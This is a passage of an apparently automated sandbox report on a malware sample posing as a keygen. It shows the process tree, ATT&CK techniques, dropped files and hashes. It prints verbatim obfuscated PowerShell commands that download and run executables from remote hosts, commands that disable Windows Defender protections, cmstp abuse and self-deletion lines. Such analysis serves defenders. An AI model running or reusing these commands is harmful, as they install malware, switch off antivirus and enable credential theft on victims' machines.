                          PID:4724
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:5088
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:4536
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:4716
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 4716 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\774954086166812\\* & exit
                          9⤵
                            PID:5104
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 4716
                              10⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4764
                    • C:\Users\Public\ruy.exe
                      "C:\Users\Public\ruy.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:3972
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D97D.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3664
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2936
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                3⤵
                • Delays execution with timeout.exe
                PID:192
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D97D.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3844
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4036
                  • C:\Users\Public\nau.exe
                    "C:\Users\Public\nau.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:4860
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:5068
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:1400
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 1400 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\696119453735605\\* & exit
                          8⤵
                            PID:4496
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 1400
                              9⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4328
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:5092
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4368
                      • C:\Users\Public\nau.exe
                        "C:\Users\Public\nau.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops desktop.ini file(s)
                        PID:4160
                        • C:\Users\Admin\AppData\Local\Temp\nXJockOwuH.exe
                          "C:\Users\Admin\AppData\Local\Temp\nXJockOwuH.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2572
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                            "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\nXJockOwuH.exe"'
                            8⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2120
                        • C:\Users\Admin\AppData\Local\Temp\S3zDf6OnKd.exe
                          "C:\Users\Admin\AppData\Local\Temp\S3zDf6OnKd.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:3320
                          • C:\Windows\SysWOW64\Notepad.exe
                            "C:\Windows\System32\Notepad.exe"
                            8⤵
                              PID:2576
                          • C:\Users\Admin\AppData\Local\Temp\TmLILLcQwK.exe
                            "C:\Users\Admin\AppData\Local\Temp\TmLILLcQwK.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2136
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\51kav105.inf
                              8⤵
                                PID:4032
                            • C:\Users\Admin\AppData\Local\Temp\9P4olCO5LW.exe
                              "C:\Users\Admin\AppData\Local\Temp\9P4olCO5LW.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4420
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4240
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nau.exe"
                              7⤵
                                PID:2888
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:4192
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D97D.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3268
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3604
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    1⤵
                      PID:4384
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c start C:\Windows\temp\bfywawiu.exe
                        2⤵
                          PID:4120
                          • C:\Windows\temp\bfywawiu.exe
                            C:\Windows\temp\bfywawiu.exe
                            3⤵
                            • Executes dropped EXE
                            PID:5116
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1676
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4548
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4204
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1516
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2100
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4176
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4268
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1104
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2444
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1084
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                              4⤵
                                PID:4776
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /IM cmstp.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4288

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Defense Evasion

                        Modify Registry

                        2
                        T1112

                        Disabling Security Tools

                        2
                        T1089

                        Credential Access

                        Credentials in Files

                        3
                        T1081

                        Discovery

                        Query Registry

                        2
                        T1012

                        System Information Discovery

                        2
                        T1082

                        Collection

                        Data from Local System

                        3
                        T1005

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\freebl3.dll
                        • C:\ProgramData\freebl3.dll
                        • C:\ProgramData\freebl3.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\msvcp140.dll
                        • C:\ProgramData\msvcp140.dll
                        • C:\ProgramData\msvcp140.dll
                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\softokn3.dll
                        • C:\ProgramData\softokn3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\vcruntime140.dll
                        • C:\ProgramData\vcruntime140.dll
                        • C:\ProgramData\vcruntime140.dll
                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Temp\9P4olCO5LW.exe
                        • C:\Users\Admin\AppData\Local\Temp\9P4olCO5LW.exe
                        • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\Keygen.exe
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\Keygen.exe
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\b.hta
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\b1.hta
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\ba.hta
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\ba1.hta
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\m.hta
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\m1.hta
                        • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\start.bat
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                        • C:\Users\Admin\AppData\Local\Temp\S3zDf6OnKd.exe
                          MD5

                          013db621a3351e3fb049efd2ccad79ff

                          SHA1

                          a23394ea54dbc5342a77938a2c285ee616185560

                          SHA256

                          df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                          SHA512

                          1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                        • C:\Users\Admin\AppData\Local\Temp\TmLILLcQwK.exe
                        • C:\Users\Admin\AppData\Local\Temp\TmLILLcQwK.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\nXJockOwuH.exe
                        • C:\Users\Admin\AppData\Local\Temp\nXJockOwuH.exe
                        • C:\Users\Public\hte.exe
                        • C:\Users\Public\hte.exe
                        • C:\Users\Public\hte.exe
                        • C:\Users\Public\nau.exe
                        • C:\Users\Public\nau.exe
                        • C:\Users\Public\nau.exe
                        • C:\Users\Public\ruy.exe
                        • C:\Users\Public\ruy.exe
                        • C:\Users\Public\ruy.exe
                        • C:\Windows\Temp\bfywawiu.exe
                          MD5

                          f4b5c1ebf4966256f52c4c4ceae87fb1

                          SHA1

                          ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                          SHA256

                          88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                          SHA512

                          02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                        • C:\Windows\temp\51kav105.inf
                        • C:\Windows\temp\bfywawiu.exe
                          MD5

                          f4b5c1ebf4966256f52c4c4ceae87fb1

                          SHA1

                          ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                          SHA256

                          88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                          SHA512

                          02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                        • \ProgramData\mozglue.dll
                        • \ProgramData\mozglue.dll
                        • \ProgramData\mozglue.dll
                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\sqlite3.dll
                        • \ProgramData\sqlite3.dll
                        • \ProgramData\sqlite3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                          MD5

                          02cc7b8ee30056d5912de54f1bdfc219

                          SHA1

                          a6923da95705fb81e368ae48f93d28522ef552fb

                          SHA256

                          1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                          SHA512

                          0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                        • \Users\Admin\AppData\LocalLow\sqlite3.dll
                        • memory/192-16-0x0000000000000000-mapping.dmp
                        • memory/1084-417-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/1084-412-0x0000000000000000-mapping.dmp
                        • memory/1104-406-0x0000000000000000-mapping.dmp
                        • memory/1104-411-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/1400-176-0x0000000000417A8B-mapping.dmp
                        • memory/1400-181-0x0000000000400000-0x0000000000439000-memory.dmp
                          Filesize

                          228KB

                        • memory/1424-178-0x0000000000400000-0x0000000000439000-memory.dmp
                          Filesize

                          228KB

                        • memory/1424-171-0x0000000000417A8B-mapping.dmp
                        • memory/1424-167-0x0000000000400000-0x0000000000439000-memory.dmp
                          Filesize

                          228KB

                        • memory/1516-389-0x0000000000000000-mapping.dmp
                        • memory/1516-394-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/1608-27-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/1608-19-0x0000000000000000-mapping.dmp
                        • memory/1608-85-0x00000000087B0000-0x00000000087B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1608-49-0x00000000076F0000-0x00000000076F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1608-33-0x0000000004CC0000-0x0000000004CC1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1676-346-0x000001A37A370000-0x000001A37A371000-memory.dmp
                          Filesize

                          4KB

                        • memory/1676-343-0x0000000000000000-mapping.dmp
                        • memory/1676-347-0x000001A37A520000-0x000001A37A521000-memory.dmp
                          Filesize

                          4KB

                        • memory/1676-345-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/1944-7-0x0000000000000000-mapping.dmp
                        • memory/1956-9-0x0000000000000000-mapping.dmp
                        • memory/2100-392-0x0000000000000000-mapping.dmp
                        • memory/2100-398-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/2120-351-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2120-349-0x0000000000000000-mapping.dmp
                        • memory/2136-293-0x00000000019B0000-0x00000000019B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2136-288-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2136-284-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2136-311-0x0000000003210000-0x0000000003222000-memory.dmp
                          Filesize

                          72KB

                        • memory/2136-281-0x0000000000000000-mapping.dmp
                        • memory/2136-313-0x000000000B250000-0x000000000B255000-memory.dmp
                          Filesize

                          20KB

                        • memory/2256-20-0x0000000000000000-mapping.dmp
                        • memory/2256-25-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2256-97-0x0000000009010000-0x0000000009011000-memory.dmp
                          Filesize

                          4KB

                        • memory/2256-91-0x0000000009A60000-0x0000000009A61000-memory.dmp
                          Filesize

                          4KB

                        • memory/2444-408-0x0000000000000000-mapping.dmp
                        • memory/2444-414-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/2572-348-0x0000000005A90000-0x0000000005AB3000-memory.dmp
                          Filesize

                          140KB

                        • memory/2572-270-0x0000000000000000-mapping.dmp
                        • memory/2572-393-0x00000000072D0000-0x00000000072D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2572-273-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2572-274-0x0000000000DC0000-0x0000000000DC1000-memory.dmp
                          Filesize

